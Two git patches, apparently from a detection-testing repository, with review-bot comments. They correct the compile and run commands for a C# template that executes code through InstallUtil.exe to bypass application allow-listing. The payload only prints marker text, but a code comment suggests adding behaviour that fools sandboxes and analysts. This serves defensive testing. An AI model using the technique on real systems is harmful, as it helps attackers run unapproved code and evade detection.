From 934bb78ea82691d7c56b3e3f14db6c8a5080e19a Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Mon, 7 May 2018 14:18:51 -0600 Subject: [PATCH 1/2] Fix --- Windows/Execution/InstallUtil.md | 2 +- Windows/Payloads/InstallUtilBypass.cs | 16 ++++++++-------- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/Windows/Execution/InstallUtil.md b/Windows/Execution/InstallUtil.md index 88c67472..5534fc11 100644 --- a/Windows/Execution/InstallUtil.md +++ b/Windows/Execution/InstallUtil.md @@ -8,7 +8,7 @@ Input: x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll - x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InastallUtilBypass.dll + x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll ## Test Script diff --git a/Windows/Payloads/InstallUtilBypass.cs b/Windows/Payloads/InstallUtilBypass.cs index 82f2de3d..c9f5437b 100644 --- a/Windows/Payloads/InstallUtilBypass.cs +++ b/Windows/Payloads/InstallUtilBypass.cs @@ -10,10 +10,10 @@ Author: Casey Smith, Twitter: @subTee License: BSD 3-Clause Step One: -C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe InstallUtilBypass.cs +C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe /target:library InstallUtilBypass.cs Step Two: -C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.exe +C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.dll */ 
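Review bot: In the header comment of InstallUtilBypass.cs, Step One now adds `/target:library` but still names the output `/out:InstallUtilBypass.exe`, while Step Two was changed to reference `InstallUtilBypass.dll`, so the two steps as written no longer refer to the same file. Step One should read `/out:InstallUtilBypass.dll`, which also matches the name used in InstallUtil.md in this same commit. For a detection-validation test this matters because a step that fails on a missing file can be misread as the control having blocked it. Once the file is built as a library, `Main()` is presumably no longer an entry point, so the comment inside it in the next hunk about behaving differently when executed directly looks stale and could be reworded or dropped. The header comment starts above this hunk, so only part of it is visible here.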
@@ -24,11 +24,11 @@ public class Program { Console.WriteLine("Hey There From Main()"); //Add any behaviour here to throw off sandbox execution/analysts :) - //These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked + //These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked //by InstallUtil.exe - + } - + } [System.ComponentModel.RunInstaller(true)] @@ -37,9 +37,9 @@ public class Sample : System.Configuration.Install.Installer //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. public override void Uninstall(System.Collections.IDictionary savedState) { - + Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed."); - + } - + } From cb7f4a7923389a4c47cff29c95eab49b1e8fc148 Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Mon, 7 May 2018 14:20:16 -0600 Subject: [PATCH 2/2] Fix --- Windows/Payloads/InstallUtilBypass.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Windows/Payloads/InstallUtilBypass.cs b/Windows/Payloads/InstallUtilBypass.cs index c9f5437b..7279cdfb 100644 --- a/Windows/Payloads/InstallUtilBypass.cs +++ b/Windows/Payloads/InstallUtilBypass.cs @@ -38,7 +38,7 @@ public class Sample : System.Configuration.Install.Installer public override void Uninstall(System.Collections.IDictionary savedState) { - Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed."); + Console.WriteLine(@"Hello There From Uninstall, If you are reading this, prevention has failed.\n"); }
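Review bot: In the PATCH 2/2 hunk, the new `Console.WriteLine` argument is a verbatim string (`@"..."`), so the added `\n` is printed as a literal backslash followed by `n` rather than as a newline. `Console.WriteLine` already terminates the line, so if an extra blank line is wanted, drop the `@`: `Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.\n");`; otherwise drop the `\n` and keep the original literal. Anyone matching on this marker string in console output or logs to confirm the test ran would see the stray `\n` characters. The enclosing class `Sample` begins outside the hunk.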